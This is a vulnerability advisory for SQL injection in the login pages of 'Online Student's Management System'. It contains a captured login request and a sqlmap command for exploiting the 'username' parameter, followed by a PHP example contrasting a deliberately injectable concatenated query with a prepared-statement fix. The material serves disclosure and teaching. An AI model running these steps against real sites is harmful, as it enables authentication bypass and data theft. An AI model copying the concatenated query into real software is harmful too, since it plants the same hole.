# Title: Online Student's Management System - Unauthenticated Multiple SQL Injections  
# Exploit Author: George Tsimpidas  
# Date: 2020-10-09  
# Vendor Homepage:  
# Software Link:  
# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)  
# Category: Webapp  
# Description  
The index.php file behind the main login page and the index.php file behind  
the /admin/ login page do not perform input validation on the regno and  
username parameters. An attacker can send malicious input in a POST request  
to http://localhost/index.php or http://localhost/admin/index.php to bypass  
authentication, extract sensitive information, etc.  
1) Navigate to the admin login page  
2) Fill in dummy values for the 'username' and 'password' fields and send the  
request via an HTTP intercept tool  
3) Save the request to a file, for example student_record_sqli.req:  
POST /admin/index.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 32  
Origin: http://localhost  
DNT: 1  
Connection: close  
4) Run sqlmap on the file:  
sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username
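
The missing input handling described above, shown beside a hardened form. This is an added example, not the application's own code: the `admin` table, its columns, the hashed-password storage and the function names are assumptions, and an in-memory SQLite database stands in for MySQL.

```php
<?php
declare(strict_types=1);
// Added example; not the application's code. Table/column names and the
// password_hash() storage format are assumptions. Requires the pdo_sqlite extension.

// Pattern described in the advisory: request input concatenated into the SQL text.
function login_concatenated(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT password_hash FROM admin WHERE username = '" . $username . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

// Hardened form: bound the input, then bind it so it is never parsed as SQL.
function login_prepared(PDO $db, string $username, string $password): bool
{
    if ($username === '' || strlen($username) > 64) {
        return false; // reject empty or oversized values before touching the database
    }
    $stmt = $db->prepare('SELECT password_hash FROM admin WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

// Constructed test data: one account whose name contains an apostrophe.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO admin VALUES (?, ?)');
$ins->execute(["o'neil", password_hash('constructed-pass', PASSWORD_DEFAULT)]);

foreach (['login_concatenated', 'login_prepared'] as $fn) {
    try {
        $ok = $fn($db, "o'neil", 'constructed-pass');
        echo "$fn: ", $ok ? 'authenticated' : 'rejected', "\n";
    } catch (PDOException $e) {
        // The quote altered the statement's structure: the value was parsed as SQL.
        echo "$fn: SQL error (input reached the SQL parser)\n";
    }
}
```

A legitimate value containing a single quote is enough to break the concatenated query, which is the signal that request data is being interpreted as SQL; the bound parameter handles the same value as plain data.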